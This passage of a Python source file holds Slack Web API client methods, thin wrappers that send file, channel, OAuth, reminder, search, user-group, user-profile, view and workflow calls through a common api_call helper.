file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.info", http_verb="GET", params=kwargs)
def files_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists & filters team files."""
return self.api_call("files.list", http_verb="GET", params=kwargs)
def files_remote_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieve information about a remote file added to Slack."""
return self.api_call("files.remote.info", http_verb="GET", params=kwargs)
def files_remote_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieve information about a remote file added to Slack."""
return self.api_call("files.remote.list", http_verb="GET", params=kwargs)
def files_remote_add(
self, *, external_id: str, external_url: str, title: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Adds a file from a remote service.
Args:
external_id (str): Creator defined GUID for the file. e.g. '123456'
external_url (str): URL of the remote file. e.g. 'http://example.com/my_cloud_service_file/abc123'
title (str): Title of the file being shared. e.g. 'Danger, High Voltage!'
"""
kwargs.update(
{"external_id": external_id, "external_url": external_url, "title": title}
)
files = None
# preview_image (file): Preview of the document via multipart/form-data.
if "preview_image" in kwargs:
files = {"preview_image": kwargs.pop("preview_image")}
return self.api_call(
# Intentionally using "POST" method over "GET" here
"files.remote.add",
http_verb="POST",
data=kwargs,
files=files,
)
def files_remote_update(self, **kwargs) -> Union[Future, SlackResponse]:
"""Updates an existing remote file."""
return self.api_call("files.remote.update", http_verb="GET", params=kwargs)
def files_remote_remove(self, **kwargs) -> Union[Future, SlackResponse]:
"""Remove a remote file."""
return self.api_call("files.remote.remove", http_verb="GET", params=kwargs)
def files_remote_share(
self, *, channels: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Share a remote file into a channel.
Args:
channels (str or list): Comma-separated list of channel IDs where the file will be shared.
e.g. ['C1234567890', 'C2345678901']
"""
if isinstance(channels, (list, Tuple)):
kwargs.update({"channels": ",".join(channels)})
else:
kwargs.update({"channels": channels})
return self.api_call("files.remote.share", http_verb="GET", params=kwargs)
def files_revokePublicURL(
self, *, file: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Revokes public/external sharing access for a file
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.revokePublicURL", json=kwargs)
def files_sharedPublicURL(
self, *, file: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Enables a file for public/external sharing.
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.sharedPublicURL", json=kwargs)
def files_upload(
self, *, file: Union[str, bytes, IOBase] = None, content: str = None, **kwargs
) -> Union[Future, SlackResponse]:
"""Uploads or creates a file.
Args:
file (str): Supply a file path.
when you'd like to upload a specific file. e.g. 'dramacat.gif'
content (str): Supply content when you'd like to create an
editable text file containing the specified text. e.g. 'launch plan'
Raises:
SlackRequestError: If neither or both the `file` and `content` args are specified.
"""
if file is None and content is None:
raise e.SlackRequestError("The file or content argument must be specified.")
if file is not None and content is not None:
raise e.SlackRequestError(
"You cannot specify both the file and the content argument."
)
if file:
if "filename" not in kwargs and isinstance(file, str):
# use the local filename if filename is missing
kwargs["filename"] = file.split(os.path.sep)[-1]
return self.api_call("files.upload", files={"file": file}, data=kwargs)
data = kwargs.copy()
data.update({"content": content})
return self.api_call("files.upload", data=data)
def groups_archive(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Archives a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.archive", json=kwargs)
def groups_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Creates a private channel.
Args:
name (str): The name of the private group. e.g. 'mychannel'
"""
kwargs.update({"name": name})
return self.api_call("groups.create", json=kwargs)
def groups_createChild(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Clones and archives a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.createChild", http_verb="GET", params=kwargs)
def groups_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.history", http_verb="GET", params=kwargs)
def groups_info(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.info", http_verb="GET", params=kwargs)
def groups_invite(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invites a user to a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("groups.invite", json=kwargs)
def groups_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("groups.kick", json=kwargs)
def groups_leave(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Leaves a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.leave", json=kwargs)
def groups_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists private channels that the calling user has access to."""
return self.api_call("groups.list", http_verb="GET", params=kwargs)
def groups_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a private channel.
Args:
channel (str): Private channel to set reading cursor in. e.g. 'C1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("groups.mark", json=kwargs)
def groups_open(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Opens a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.open", json=kwargs)
def groups_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("groups.rename", json=kwargs)
def groups_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a private channel
Args:
channel (str): The channel id. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("groups.replies", http_verb="GET", params=kwargs)
def groups_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("groups.setPurpose", json=kwargs)
def groups_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("groups.setTopic", json=kwargs)
def groups_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchives a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.unarchive", json=kwargs)
def im_close(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Close a direct message channel.
Args:
channel (str): Direct message channel to close. e.g. 'D1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("im.close", json=kwargs)
def im_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from direct message channel.
Args:
channel (str): Direct message channel to fetch history from. e.g. 'D1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("im.history", http_verb="GET", params=kwargs)
def im_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists direct message channels for the calling user."""
return self.api_call("im.list", http_verb="GET", params=kwargs)
def im_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a direct message channel.
Args:
channel (str): Direct message channel to set reading cursor in. e.g. 'D1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("im.mark", json=kwargs)
def im_open(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
"""Opens a direct message channel.
Args:
user (str): The user id to open a DM with. e.g. 'W1234567890'
"""
kwargs.update({"user": user})
return self.api_call("im.open", json=kwargs)
def im_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a direct message conversation
Args:
channel (str): Direct message channel to fetch thread from. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("im.replies", http_verb="GET", params=kwargs)
def migration_exchange(
self, *, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""For Enterprise Grid workspaces, map local user IDs to global user IDs
Args:
users (str or list): A list of user ids, up to 400 per request.
e.g. ['W1234567890', 'U2345678901', 'U3456789012']
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("migration.exchange", http_verb="GET", params=kwargs)
def mpim_close(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Closes a multiparty direct message channel.
Args:
channel (str): Multiparty Direct message channel to close. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("mpim.close", json=kwargs)
def mpim_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a multiparty direct message.
Args:
channel (str): Multiparty direct message to fetch history for. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("mpim.history", http_verb="GET", params=kwargs)
def mpim_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists multiparty direct message channels for the calling user."""
return self.api_call("mpim.list", http_verb="GET", params=kwargs)
def mpim_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a multiparty direct message channel.
Args:
channel (str): Multiparty direct message channel to set reading cursor in.
e.g. 'G1234567890'
ts (str): Timestamp of the most recently seen message.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("mpim.mark", json=kwargs)
def mpim_open(
self, *, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""This method opens a multiparty direct message.
Args:
users (str or list): A lists of user ids. The ordering of the users
is preserved whenever a MPIM group is returned.
e.g. ['W1234567890', 'U2345678901', 'U3456789012']
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("mpim.open", params=kwargs)
def mpim_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a direct message conversation from a
multiparty direct message.
Args:
channel (str): Multiparty direct message channel to fetch thread from.
e.g. 'G1234567890'
thread_ts (str): Unique identifier of a thread's parent message.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("mpim.replies", http_verb="GET", params=kwargs)
def oauth_v2_access(
self,
*,
client_id: str,
client_secret: str,
# This field is required when processing the OAuth redirect URL requests
# while it's absent for token rotation
code: Optional[str] = None,
redirect_uri: Optional[str] = None,
# This field is required for token rotation
grant_type: Optional[str] = None,
# This field is required for token rotation
refresh_token: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token.
Args:
client_id (str): Issued when you created your application. e.g. '4b39e9-752c4'
client_secret (str): Issued when you created your application. e.g. '33fea0113f5b1'
code (str): The code param returned via the OAuth callback. e.g. 'ccdaa72ad'
redirect_uri (optional str): Must match the originally submitted URI
(if one was sent). e.g. 'https://example.com'
grant_type: The grant type. The possible value is only 'refresh_token' as of July 2021.
refresh_token: The refresh token for token rotation.
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
if code is not None:
kwargs.update({"code": code})
if grant_type is not None:
kwargs.update({"grant_type": grant_type})
if refresh_token is not None:
kwargs.update({"refresh_token": refresh_token})
return self.api_call(
"oauth.v2.access",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def oauth_access(
self,
*,
client_id: str,
client_secret: str,
code: str,
redirect_uri: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token.
Args:
client_id (str): Issued when you created your application. e.g. '4b39e9-752c4'
client_secret (str): Issued when you created your application. e.g. '33fea0113f5b1'
code (str): The code param returned via the OAuth callback. e.g. 'ccdaa72ad'
redirect_uri (optional str): Must match the originally submitted URI
(if one was sent). e.g. 'https://example.com'
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
kwargs.update({"code": code})
return self.api_call(
"oauth.access",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def oauth_v2_exchange(
self, *, token: str, client_id: str, client_secret: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a legacy access token for a new expiring access token and refresh token
Args:
token: The legacy xoxb or xoxp token being migrated to use token rotation.
client_id: Issued when you created your application.
client_secret: Issued when you created your application.
"""
kwargs.update(
{"client_id": client_id, "client_secret": client_secret, "token": token}
)
return self.api_call("oauth.v2.exchange", params=kwargs)
def openid_connect_token(
self,
client_id: str,
client_secret: str,
code: Optional[str] = None,
redirect_uri: Optional[str] = None,
grant_type: Optional[str] = None,
refresh_token: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token for Sign in with Slack.
Args:
client_id (str): Issued when you created your application.
client_secret (str): Issued when you created your application.
code (str): The code param returned via the OAuth callback.
redirect_uri (optional str): This must match the originally submitted URI (if one was sent).
grant_type: The grant_type param as described in the OAuth spec.
refresh_token: The refresh_token param as described in the OAuth spec.
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
if code is not None:
kwargs.update({"code": code})
if grant_type is not None:
kwargs.update({"grant_type": grant_type})
if refresh_token is not None:
kwargs.update({"refresh_token": refresh_token})
return self.api_call(
"openid.connect.token",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def openid_connect_userInfo(self, **kwargs) -> Union[Future, SlackResponse]:
"""Get the identity of a user who has authorized Sign in with Slack."""
return self.api_call("openid.connect.userInfo", params=kwargs)
def pins_add(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Pins an item to a channel.
Args:
channel (str): Channel to pin the item in. e.g. 'C1234567890'
file (str): File id to pin. e.g. 'F1234567890'
file_comment (str): File comment to pin. e.g. 'Fc1234567890'
timestamp (str): Timestamp of message to pin. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.add", json=kwargs)
def pins_list(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Lists items pinned to a channel.
Args:
channel (str): Channel to get pinned items for. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.list", http_verb="GET", params=kwargs)
def pins_remove(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Un-pins an item from a channel.
Args:
channel (str): Channel to pin the item in. e.g. 'C1234567890'
file (str): File id to pin. e.g. 'F1234567890'
file_comment (str): File comment to pin. e.g. 'Fc1234567890'
timestamp (str): Timestamp of message to pin. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.remove", json=kwargs)
def reactions_add(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Adds a reaction to an item.
Args:
name (str): Reaction (emoji) name. e.g. 'thumbsup'
channel (str): Channel where the message to add reaction to was posted.
e.g. 'C1234567890'
timestamp (str): Timestamp of the message to add reaction to. e.g. '1234567890.123456'
"""
kwargs.update({"name": name})
return self.api_call("reactions.add", json=kwargs)
def reactions_get(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets reactions for an item."""
return self.api_call("reactions.get", http_verb="GET", params=kwargs)
def reactions_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists reactions made by a user."""
return self.api_call("reactions.list", http_verb="GET", params=kwargs)
def reactions_remove(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Removes a reaction from an item.
Args:
name (str): Reaction (emoji) name. e.g. 'thumbsup'
"""
kwargs.update({"name": name})
return self.api_call("reactions.remove", json=kwargs)
def reminders_add(
self, *, text: str, time: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Creates a reminder.
Args:
text (str): The content of the reminder. e.g. 'eat a banana'
time (str): When this reminder should happen:
the Unix timestamp (up to five years from now e.g. '1602288000'),
the number of seconds until the reminder (if within 24 hours),
or a natural language description (Ex. 'in 15 minutes' or 'every Thursday')
"""
kwargs.update({"text": text, "time": time})
return self.api_call("reminders.add", json=kwargs)
def reminders_complete(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Marks a reminder as complete.
Args:
reminder (str): The ID of the reminder to be marked as complete.
e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.complete", json=kwargs)
def reminders_delete(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deletes a reminder.
Args:
reminder (str): The ID of the reminder. e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.delete", json=kwargs)
def reminders_info(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Gets information about a reminder.
Args:
reminder (str): The ID of the reminder. e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.info", http_verb="GET", params=kwargs)
def reminders_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all reminders created by or for a given user."""
return self.api_call("reminders.list", http_verb="GET", params=kwargs)
def rtm_connect(self, **kwargs) -> Union[Future, SlackResponse]:
"""Starts a Real Time Messaging session."""
return self.api_call("rtm.connect", http_verb="GET", params=kwargs)
def rtm_start(self, **kwargs) -> Union[Future, SlackResponse]:
"""Starts a Real Time Messaging session."""
return self.api_call("rtm.start", http_verb="GET", params=kwargs)
    def search_all(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
        """Searches for messages and files matching a query.
        Args:
            query (str): Search query. May contains booleans, etc.
                e.g. 'pickleface'
        """
        kwargs.update({"query": query})
        return self.api_call("search.all", http_verb="GET", params=kwargs)
    def search_files(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
        """Searches for files matching a query.
        Args:
            query (str): Search query. May contains booleans, etc.
                e.g. 'pickleface'
        """
        kwargs.update({"query": query})
        return self.api_call("search.files", http_verb="GET", params=kwargs)
    def search_messages(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
        """Searches for messages matching a query.
        Args:
            query (str): Search query. May contains booleans, etc.
                e.g. 'pickleface'
        """
        kwargs.update({"query": query})
        return self.api_call("search.messages", http_verb="GET", params=kwargs)
    def stars_add(self, **kwargs) -> Union[Future, SlackResponse]:
        """Adds a star to an item.
        Exactly one target should be identified via the keyword arguments
        below; they are forwarded verbatim to the API.
        Args:
            channel (str): Channel to add star to, or channel where the message to add
                star to was posted (used with timestamp). e.g. 'C1234567890'
            file (str): File to add star to. e.g. 'F1234567890'
            file_comment (str): File comment to add star to. e.g. 'Fc1234567890'
            timestamp (str): Timestamp of the message to add star to. e.g. '1234567890.123456'
        """
        return self.api_call("stars.add", json=kwargs)
    def stars_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """Lists stars for a user."""
        return self.api_call("stars.list", http_verb="GET", params=kwargs)
    def stars_remove(self, **kwargs) -> Union[Future, SlackResponse]:
        """Removes a star from an item.
        Args:
            channel (str): Channel to remove star from, or channel where
                the message to remove star from was posted (used with timestamp). e.g. 'C1234567890'
            file (str): File to remove star from. e.g. 'F1234567890'
            file_comment (str): File comment to remove star from. e.g. 'Fc1234567890'
            timestamp (str): Timestamp of the message to remove star from. e.g. '1234567890.123456'
        """
        return self.api_call("stars.remove", json=kwargs)
    def team_accessLogs(self, **kwargs) -> Union[Future, SlackResponse]:
        """Gets the access logs for the current team."""
        return self.api_call("team.accessLogs", http_verb="GET", params=kwargs)
    def team_billableInfo(self, **kwargs) -> Union[Future, SlackResponse]:
        """Gets billable users information for the current team."""
        return self.api_call("team.billableInfo", http_verb="GET", params=kwargs)
    def team_info(self, **kwargs) -> Union[Future, SlackResponse]:
        """Gets information about the current team."""
        return self.api_call("team.info", http_verb="GET", params=kwargs)
    def team_integrationLogs(self, **kwargs) -> Union[Future, SlackResponse]:
        """Gets the integration logs for the current team."""
        return self.api_call("team.integrationLogs", http_verb="GET", params=kwargs)
    def team_profile_get(self, **kwargs) -> Union[Future, SlackResponse]:
        """Retrieve a team's profile."""
        return self.api_call("team.profile.get", http_verb="GET", params=kwargs)
    def usergroups_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
        """Create a User Group
        Args:
            name (str): A name for the User Group. Must be unique among User Groups.
                e.g. 'My Test Team'
        """
        kwargs.update({"name": name})
        return self.api_call("usergroups.create", json=kwargs)
    def usergroups_disable(
        self, *, usergroup: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Disable an existing User Group
        Args:
            usergroup (str): The encoded ID of the User Group to disable.
                e.g. 'S0604QSJC'
        """
        kwargs.update({"usergroup": usergroup})
        return self.api_call("usergroups.disable", json=kwargs)
    def usergroups_enable(
        self, *, usergroup: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Enable a User Group
        Args:
            usergroup (str): The encoded ID of the User Group to enable.
                e.g. 'S0604QSJC'
        """
        kwargs.update({"usergroup": usergroup})
        return self.api_call("usergroups.enable", json=kwargs)
    def usergroups_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """List all User Groups for a team"""
        return self.api_call("usergroups.list", http_verb="GET", params=kwargs)
    def usergroups_update(
        self, *, usergroup: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Update an existing User Group
        Args:
            usergroup (str): The encoded ID of the User Group to update.
                e.g. 'S0604QSJC'
        """
        kwargs.update({"usergroup": usergroup})
        return self.api_call("usergroups.update", json=kwargs)
    def usergroups_users_list(
        self, *, usergroup: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """List all users in a User Group
        Args:
            usergroup (str): The encoded ID of the User Group to list users for.
                e.g. 'S0604QSJC'
        """
        kwargs.update({"usergroup": usergroup})
        return self.api_call("usergroups.users.list", http_verb="GET", params=kwargs)
def usergroups_users_update(
self, *, usergroup: str, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Update the list of users for a User Group
Args:
usergroup (str): The encoded ID of the User Group to update.
e.g. 'S0604QSJC'
users (str or list): A list user IDs that represent the entire list of
users for the User Group. e.g. ['U060R4BJ4', 'U060RNRCZ']
"""
kwargs.update({"usergroup": usergroup})
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("usergroups.users.update", params=kwargs)
    def users_conversations(self, **kwargs) -> Union[Future, SlackResponse]:
        """List conversations the calling user may access."""
        return self.api_call("users.conversations", http_verb="GET", params=kwargs)
    def users_deletePhoto(self, **kwargs) -> Union[Future, SlackResponse]:
        """Delete the user profile photo"""
        # NOTE(review): sent as HTTP GET here; Slack's docs describe
        # users.deletePhoto as a POST endpoint -- confirm before changing.
        return self.api_call("users.deletePhoto", http_verb="GET", params=kwargs)
    def users_getPresence(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
        """Gets user presence information.
        Args:
            user (str): User to get presence info on. Defaults to the authed user.
                e.g. 'W1234567890'
        """
        kwargs.update({"user": user})
        return self.api_call("users.getPresence", http_verb="GET", params=kwargs)
    def users_identity(self, **kwargs) -> Union[Future, SlackResponse]:
        """Get a user's identity."""
        return self.api_call("users.identity", http_verb="GET", params=kwargs)
    def users_info(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
        """Gets information about a user.
        Args:
            user (str): User to get info on.
                e.g. 'W1234567890'
        """
        kwargs.update({"user": user})
        return self.api_call("users.info", http_verb="GET", params=kwargs)
    def users_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """Lists all users in a Slack team."""
        return self.api_call("users.list", http_verb="GET", params=kwargs)
    def users_lookupByEmail(
        self, *, email: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Find a user with an email address.
        Args:
            email (str): An email address belonging to a user in the workspace.
                e.g. 'spengler@ghostbusters.example.com'
        """
        kwargs.update({"email": email})
        return self.api_call("users.lookupByEmail", http_verb="GET", params=kwargs)
    def users_setPhoto(
        self, *, image: Union[str, IOBase], **kwargs
    ) -> Union[Future, SlackResponse]:
        """Set the user profile photo
        Args:
            image (str or IOBase): Path of the image to upload, or an already
                opened file-like object. e.g. 'myimage.png'
        """
        # Uploaded as multipart/form-data via `files`, not a JSON body.
        return self.api_call("users.setPhoto", files={"image": image}, data=kwargs)
    def users_setPresence(
        self, *, presence: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Manually sets user presence.
        Args:
            presence (str): Either 'auto' or 'away'.
        """
        kwargs.update({"presence": presence})
        return self.api_call("users.setPresence", json=kwargs)
    def users_profile_get(self, **kwargs) -> Union[Future, SlackResponse]:
        """Retrieves a user's profile information."""
        return self.api_call("users.profile.get", http_verb="GET", params=kwargs)
    def users_profile_set(self, **kwargs) -> Union[Future, SlackResponse]:
        """Set the profile information for a user."""
        return self.api_call("users.profile.set", json=kwargs)
def views_open(
self, *, trigger_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Open a view for a user.
See https://api.slack.com/block-kit/surfaces/modals for details.
Args:
trigger_id (str): Exchange a trigger to post to the user.
e.g. '12345.98765.abcd2358fdea'
view (dict or View): The view payload.
"""
kwargs.update({"trigger_id": trigger_id})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.open", json=kwargs)
def views_push(
self, *, trigger_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Push a view onto the stack of a root view.
Push a new view onto the existing view stack by passing a view
payload and a valid trigger_id generated from an interaction
within the existing modal.
Read the modals documentation (https://api.slack.com/block-kit/surfaces/modals)
to learn more about the lifecycle and intricacies of views.
Args:
trigger_id (str): Exchange a trigger to post to the user.
e.g. '12345.98765.abcd2358fdea'
view (dict or View): The view payload.
"""
kwargs.update({"trigger_id": trigger_id, "view": view})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.push", json=kwargs)
    def views_update(
        self,
        *,
        view: Union[dict, View],
        external_id: str = None,
        view_id: str = None,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Update an existing view.
        Update a view by passing a new view definition along with the
        view_id returned in views.open or the external_id.
        See the modals documentation (https://api.slack.com/block-kit/surfaces/modals#updating_views)
        to learn more about updating views and avoiding race conditions with the hash argument.
        Args:
            view (dict or View): The view payload.
            external_id (str): A unique identifier of the view set by the developer.
                e.g. 'bmarley_view2'
            view_id (str): A unique identifier of the view to be updated.
                e.g. 'VMM512F2U'
        Raises:
            SlackRequestError: Either view_id or external_id is required.
        """
        # Serialise a View model into a plain dict for the JSON body.
        if isinstance(view, View):
            kwargs.update({"view": view.to_dict()})
        else:
            kwargs.update({"view": view})
        # Exactly one identifier must be supplied; when both are truthy,
        # external_id takes precedence and view_id is silently ignored.
        if external_id:
            kwargs.update({"external_id": external_id})
        elif view_id:
            kwargs.update({"view_id": view_id})
        else:
            raise e.SlackRequestError("Either view_id or external_id is required.")
        return self.api_call("views.update", json=kwargs)
def views_publish(
self, *, user_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Publish a static view for a User.
Create or update the view that comprises an
app's Home tab (https://api.slack.com/surfaces/tabs)
for a specific user.
Args:
user_id (str): id of the user you want publish a view to.
e.g. 'U0BPQUNTA'
view (dict or View): The view payload.
"""
kwargs.update({"user_id": user_id})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.publish", json=kwargs)
def workflows_stepCompleted(
self, *, workflow_step_execute_id: str, outputs: dict = None, **kwargs
) -> Union[Future, SlackResponse]:
"""Indicate a successful outcome of a workflow step's execution.
Args:
workflow_step_execute_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
outputs (dict): A key-value object of outputs from your step.
e.g. { 'task_name': 'Task Name' }
"""
kwargs.update({"workflow_step_execute_id": workflow_step_execute_id})
if outputs:
kwargs.update({"outputs": outputs})
return self.api_call("workflows.stepCompleted", json=kwargs)
def workflows_stepFailed(
self, *, workflow_step_execute_id: str, error: dict, **kwargs
) -> Union[Future, SlackResponse]:
"""Indicate an unsuccessful outcome of a workflow step's execution.
Args:
workflow_step_execute_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
error (dict): A dict with a message property that contains a human readable error message
e.g. { message: 'Step failed to execute.' }
"""
kwargs.update(
{"workflow_step_execute_id": workflow_step_execute_id, "error": error}
)
return self.api_call("workflows.stepFailed", json=kwargs)
def workflows_updateStep(
self,
*,
